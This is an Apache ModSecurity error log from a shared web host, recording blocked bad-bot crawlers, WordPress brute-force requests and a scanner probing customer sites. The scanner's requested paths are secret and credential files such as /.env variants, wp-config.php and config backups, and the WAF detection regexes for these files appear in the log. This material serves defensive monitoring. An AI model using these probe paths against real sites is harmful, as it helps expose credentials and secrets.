[Tue May 26 14:55:35.794208 2026] [security2:error] [pid 662057:tid 662252] [client 85.208.96.202:54720] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/pages/services-wide/"] [unique_id "ahVnD_T3lMm9tGFVg9RPvAAAAUs"]
[Tue May 26 14:55:35.794382 2026] [security2:error] [pid 662057:tid 662252] [client 85.208.96.202:54720] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.anujtradingco.com"] [uri "/pages/services-wide/"] [unique_id "ahVnD_T3lMm9tGFVg9RPvAAAAUs"]
[Tue May 26 14:55:35.879665 2026] [security2:error] [pid 662057:tid 662224] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnD_T3lMm9tGFVg9RPuwAAAS8"]
[Tue May 26 14:55:36.736233 2026] [security2:error] [pid 658374:tid 658610] [client 154.161.32.97:47140] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVnEJ1Mb7_aby-E0Kc1rAAAAGo"]
[Tue May 26 14:55:36.736412 2026] [security2:error] [pid 658374:tid 658610] [client 154.161.32.97:47140] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVnEJ1Mb7_aby-E0Kc1rAAAAGo"]
[Tue May 26 14:55:38.132475 2026] [security2:error] [pid 662057:tid 662287] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnEfT3lMm9tGFVg9RPywAAAW4"]
[Tue May 26 14:55:38.505119 2026] [security2:error] [pid 662057:tid 662241] [client 154.161.32.97:47141] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVnEvT3lMm9tGFVg9RP5gAAAUA"]
[Tue May 26 14:55:38.505253 2026] [security2:error] [pid 662057:tid 662241] [client 154.161.32.97:47141] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVnEvT3lMm9tGFVg9RP5gAAAUA"]
[Tue May 26 14:55:39.375998 2026] [security2:error] [pid 658374:tid 658461] [remote 45.148.10.5:5368] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "jetstarprojects.com"] [uri "/.env"] [unique_id "ahVnE51Mb7_aby-E0Kc12wAAJFY"]
[Tue May 26 14:55:39.553434 2026] [security2:error] [pid 658374:tid 658440] [remote 91.227.122.219:36294] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.122.227.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahVnE51Mb7_aby-E0Kc12gAAPkE"]
[Tue May 26 14:55:39.758173 2026] [security2:error] [pid 658374:tid 658558] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnE51Mb7_aby-E0Kc12QAAADY"]
[Tue May 26 14:55:40.033297 2026] [security2:error] [pid 658374:tid 658589] [client 172.224.240.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVnE51Mb7_aby-E0Kc17AAAAFU"]
[Tue May 26 14:55:41.479199 2026] [security2:error] [pid 658374:tid 658583] [client 78.190.43.206:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVnFZ1Mb7_aby-E0Kc2EQAAAE8"], referer: https://www.anujtradingco.com/
[Tue May 26 14:55:42.486366 2026] [security2:error] [pid 658374:tid 658556] [client 78.190.43.206:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVnFp1Mb7_aby-E0Kc2KQAAADQ"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1430896&
[Tue May 26 14:55:42.628266 2026] [security2:error] [pid 658374:tid 658521] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnFp1Mb7_aby-E0Kc2IAAAABE"]
[Tue May 26 14:55:44.351049 2026] [security2:error] [pid 658374:tid 658463] [remote 88.198.91.116:48268] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.91.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "nicmaperu.com"] [uri "/wp-login.php"] [unique_id "ahVnGJ1Mb7_aby-E0Kc2TQAAT1g"]
[Tue May 26 14:55:44.879469 2026] [security2:error] [pid 662057:tid 662302] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnGPT3lMm9tGFVg9RQGQAAAX0"]
[Tue May 26 14:55:44.988259 2026] [security2:error] [pid 662057:tid 662231] [client 35.207.209.199:40756] ModSecurity: Warning. Matched phrase "BuiltWith" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "rmbtsbd.com"] [uri "/public/index.php"] [unique_id "ahVnGPT3lMm9tGFVg9RQEwAAATY"]
[Tue May 26 14:55:45.150178 2026] [security2:error] [pid 662057:tid 662205] [client 35.207.209.199:38270] ModSecurity: Warning. Matched phrase "BuiltWith" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "rmbtsbd.com"] [uri "/public/index.php"] [unique_id "ahVnGfT3lMm9tGFVg9RQHgAAARw"]
[Tue May 26 14:55:46.226512 2026] [security2:error] [pid 658374:tid 658594] [client 35.207.209.199:40778] ModSecurity: Warning. Matched phrase "BuiltWith" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "rmbtsbd.com"] [uri "/public/index.php"] [unique_id "ahVnGp1Mb7_aby-E0Kc2dgAAAFo"]
[Tue May 26 14:55:46.226545 2026] [security2:error] [pid 658374:tid 658594] [client 35.207.209.199:40778] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rmbtsbd.com"] [uri "/public/index.php"] [unique_id "ahVnGp1Mb7_aby-E0Kc2dgAAAFo"]
[Tue May 26 14:55:46.268157 2026] [security2:error] [pid 658374:tid 658446] [remote 45.148.10.5:5368] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "jetstarprojects.com"] [uri "/.env.backup"] [unique_id "ahVnGp1Mb7_aby-E0Kc2ewAAe0c"]
[Tue May 26 14:55:46.608320 2026] [security2:error] [pid 658374:tid 658624] [client 35.207.209.199:40778] ModSecurity: Warning. Matched phrase "BuiltWith" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "rmbtsbd.com"] [uri "/public/index.php"] [unique_id "ahVnGp1Mb7_aby-E0Kc2gwAAAHg"]
[Tue May 26 14:55:46.922099 2026] [security2:error] [pid 658374:tid 658471] [remote 45.148.10.5:5368] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "jetstarprojects.com"] [uri "/.env.old"] [unique_id "ahVnGp1Mb7_aby-E0Kc2jwAAYGA"]
[Tue May 26 14:55:47.056135 2026] [security2:error] [pid 662057:tid 662201] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnGvT3lMm9tGFVg9RQNAAAARg"]
[Tue May 26 14:55:47.295530 2026] [security2:error] [pid 658374:tid 658555] [client 35.207.209.199:40782] ModSecurity: Warning. Matched phrase "BuiltWith" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "rmbtsbd.com"] [uri "/public/index.php"] [unique_id "ahVnG51Mb7_aby-E0Kc2kwAAADM"]
[Tue May 26 14:55:47.339702 2026] [security2:error] [pid 658374:tid 658495] [remote 45.148.10.5:5368] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "jetstarprojects.com"] [uri "/.env.bak"] [unique_id "ahVnG51Mb7_aby-E0Kc2lgAABHg"]
[Tue May 26 14:55:47.627226 2026] [security2:error] [pid 658374:tid 658517] [client 35.207.209.199:40778] ModSecurity: Warning. Matched phrase "BuiltWith" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "rmbtsbd.com"] [uri "/public/build/assets/app-B08h0slU.js"] [unique_id "ahVnG51Mb7_aby-E0Kc2nwAAAA0"]
[Tue May 26 14:55:47.978398 2026] [security2:error] [pid 658374:tid 658554] [client 35.207.209.199:40782] ModSecurity: Warning. Matched phrase "BuiltWith" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "rmbtsbd.com"] [uri "/public/index.php"] [unique_id "ahVnG51Mb7_aby-E0Kc2oAAAAGE"]
[Tue May 26 14:55:48.655285 2026] [security2:error] [pid 658374:tid 658521] [client 35.207.209.199:40782] ModSecurity: Warning. Matched phrase "BuiltWith" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "rmbtsbd.com"] [uri "/public/index.php"] [unique_id "ahVnHJ1Mb7_aby-E0Kc2qgAAABE"]
[Tue May 26 14:55:48.655328 2026] [security2:error] [pid 658374:tid 658521] [client 35.207.209.199:40782] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rmbtsbd.com"] [uri "/public/index.php"] [unique_id "ahVnHJ1Mb7_aby-E0Kc2qgAAABE"]
[Tue May 26 14:55:48.662705 2026] [security2:error] [pid 658374:tid 658537] [client 35.207.209.199:40778] ModSecurity: Warning. Matched phrase "BuiltWith" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "rmbtsbd.com"] [uri "/public/index.php"] [unique_id "ahVnHJ1Mb7_aby-E0Kc2qQAAACE"]
[Tue May 26 14:55:48.825908 2026] [security2:error] [pid 662057:tid 662216] [client 40.77.167.187:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVnHPT3lMm9tGFVg9RQVQAAASc"]
[Tue May 26 14:55:49.136959 2026] [security2:error] [pid 658374:tid 658454] [remote 45.148.10.5:5368] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "jetstarprojects.com"] [uri "/config/.env"] [unique_id "ahVnHZ1Mb7_aby-E0Kc2rgAAQE8"]
[Tue May 26 14:55:49.272075 2026] [security2:error] [pid 662057:tid 662203] [client 35.207.209.199:40786] ModSecurity: Warning. Matched phrase "BuiltWith" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "rmbtsbd.com"] [uri "/public/index.php"] [unique_id "ahVnHfT3lMm9tGFVg9RQaQAAARo"]
[Tue May 26 14:55:49.272098 2026] [security2:error] [pid 662057:tid 662203] [client 35.207.209.199:40786] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rmbtsbd.com"] [uri "/public/index.php"] [unique_id "ahVnHfT3lMm9tGFVg9RQaQAAARo"]
[Tue May 26 14:55:49.305619 2026] [security2:error] [pid 662057:tid 662273] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnHPT3lMm9tGFVg9RQXQAAAWA"]
[Tue May 26 14:55:49.442563 2026] [security2:error] [pid 662057:tid 662194] [client 74.7.175.162:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVnHPT3lMm9tGFVg9RQTwAAARE"]
[Tue May 26 14:55:49.443487 2026] [security2:error] [pid 662057:tid 662199] [client 74.7.175.162:37354] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "soto-plumbing.com"] [uri "/robots.txt"] [unique_id "ahVnHPT3lMm9tGFVg9RQTAABFgo"]
[Tue May 26 14:55:49.494547 2026] [security2:error] [pid 658374:tid 658497] [remote 45.148.10.5:5368] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "jetstarprojects.com"] [uri "/app/.env"] [unique_id "ahVnHZ1Mb7_aby-E0Kc2tQAAe3o"]
[Tue May 26 14:55:49.975404 2026] [security2:error] [pid 658374:tid 658450] [remote 45.148.10.5:5368] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "jetstarprojects.com"] [uri "/src/.env"] [unique_id "ahVnHZ1Mb7_aby-E0Kc2uAAAV0s"]
[Tue May 26 14:55:50.437917 2026] [security2:error] [pid 662057:tid 662215] [client 35.207.209.199:40796] ModSecurity: Warning. Matched phrase "BuiltWith" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "rmbtsbd.com"] [uri "/public/index.php"] [unique_id "ahVnHvT3lMm9tGFVg9RQhgAAASY"]
[Tue May 26 14:55:50.437941 2026] [security2:error] [pid 662057:tid 662215] [client 35.207.209.199:40796] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rmbtsbd.com"] [uri "/public/index.php"] [unique_id "ahVnHvT3lMm9tGFVg9RQhgAAASY"]
[Tue May 26 14:55:50.476009 2026] [security2:error] [pid 658374:tid 658499] [remote 45.148.10.5:5368] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "jetstarprojects.com"] [uri "/backend/.env"] [unique_id "ahVnHp1Mb7_aby-E0Kc2uwAAPHw"]
[Tue May 26 14:55:51.415253 2026] [security2:error] [pid 662057:tid 662259] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnHvT3lMm9tGFVg9RQkwAAAVI"]
[Tue May 26 14:55:52.628937 2026] [security2:error] [pid 658374:tid 658447] [remote 45.148.10.5:5368] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "jetstarprojects.com"] [uri "/api/.env"] [unique_id "ahVnIJ1Mb7_aby-E0Kc21wAAfkg"]
[Tue May 26 14:55:53.583513 2026] [security2:error] [pid 658374:tid 658430] [remote 45.148.10.5:5368] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jetstarprojects.com"] [uri "/config.php"] [unique_id "ahVnIZ1Mb7_aby-E0Kc28gAAADc"]
[Tue May 26 14:55:54.277376 2026] [security2:error] [pid 662057:tid 662291] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnIfT3lMm9tGFVg9RQuAAAAXI"]
[Tue May 26 14:55:54.389334 2026] [security2:error] [pid 658374:tid 658458] [remote 45.148.10.5:5368] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jetstarprojects.com"] [uri "/settings.php"] [unique_id "ahVnIp1Mb7_aby-E0Kc3AwAAFFM"]
[Tue May 26 14:55:55.279052 2026] [security2:error] [pid 658374:tid 658379] [remote 45.148.10.5:5368] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jetstarprojects.com"] [uri "/wp-config.php"] [unique_id "ahVnI51Mb7_aby-E0Kc3EQAAGgQ"]
[Tue May 26 14:55:55.573864 2026] [fcgid:warn] [pid 658374:tid 658520] (70008)Partial results are valid but processing is incomplete: [client 195.178.110.135:14908] mod_fcgid: can't get data from http client
[Tue May 26 14:55:55.578028 2026] [fcgid:warn] [pid 658374:tid 658549] (70008)Partial results are valid but processing is incomplete: [client 195.178.110.135:14902] mod_fcgid: can't get data from http client
[Tue May 26 14:55:55.578849 2026] [fcgid:warn] [pid 662057:tid 662254] (70008)Partial results are valid but processing is incomplete: [client 195.178.110.135:14910] mod_fcgid: can't get data from http client
[Tue May 26 14:55:55.714104 2026] [security2:error] [pid 662057:tid 662292] [client 114.119.144.29:30809] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "newdental.com.co"] [uri "/"] [unique_id "ahVnI_T3lMm9tGFVg9RQ1AAAAXM"], referer: http://newdental.com.co/?ucci/6851136729676942l11a/defdbg35780d.undeserver
[Tue May 26 14:55:56.266194 2026] [security2:error] [pid 662057:tid 662229] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnI_T3lMm9tGFVg9RQ3gAAATQ"]
[Tue May 26 14:55:56.915794 2026] [security2:error] [pid 662057:tid 662081] [remote 34.56.168.230:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.168.56.34.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "stockmarketanalysis.in"] [uri "/freetrial.php"] [unique_id "ahVnJPT3lMm9tGFVg9RQ8QABIRc"]
[Tue May 26 14:55:56.986933 2026] [security2:error] [pid 662057:tid 662215] [client 40.77.167.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVnJPT3lMm9tGFVg9RQ8wAAASY"]
[Tue May 26 14:55:57.640755 2026] [security2:error] [pid 662057:tid 662214] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnJfT3lMm9tGFVg9RQ-AAAASU"]
[Tue May 26 14:55:58.357170 2026] [security2:error] [pid 662057:tid 662205] [client 14.248.44.94:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnJfT3lMm9tGFVg9RRBQAAARw"]
[Tue May 26 14:55:58.919996 2026] [security2:error] [pid 662057:tid 662092] [remote 34.63.170.141:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 141.170.63.34.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "stockmarketanalysis.in"] [uri "/freetrial.php"] [unique_id "ahVnJvT3lMm9tGFVg9RREwABdCI"]
[Tue May 26 14:55:58.998955 2026] [security2:error] [pid 658374:tid 658475] [remote 45.148.10.5:5368] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jetstarprojects.com"] [uri "/config.php.bak"] [unique_id "ahVnJp1Mb7_aby-E0Kc3OAAAQ2Q"]
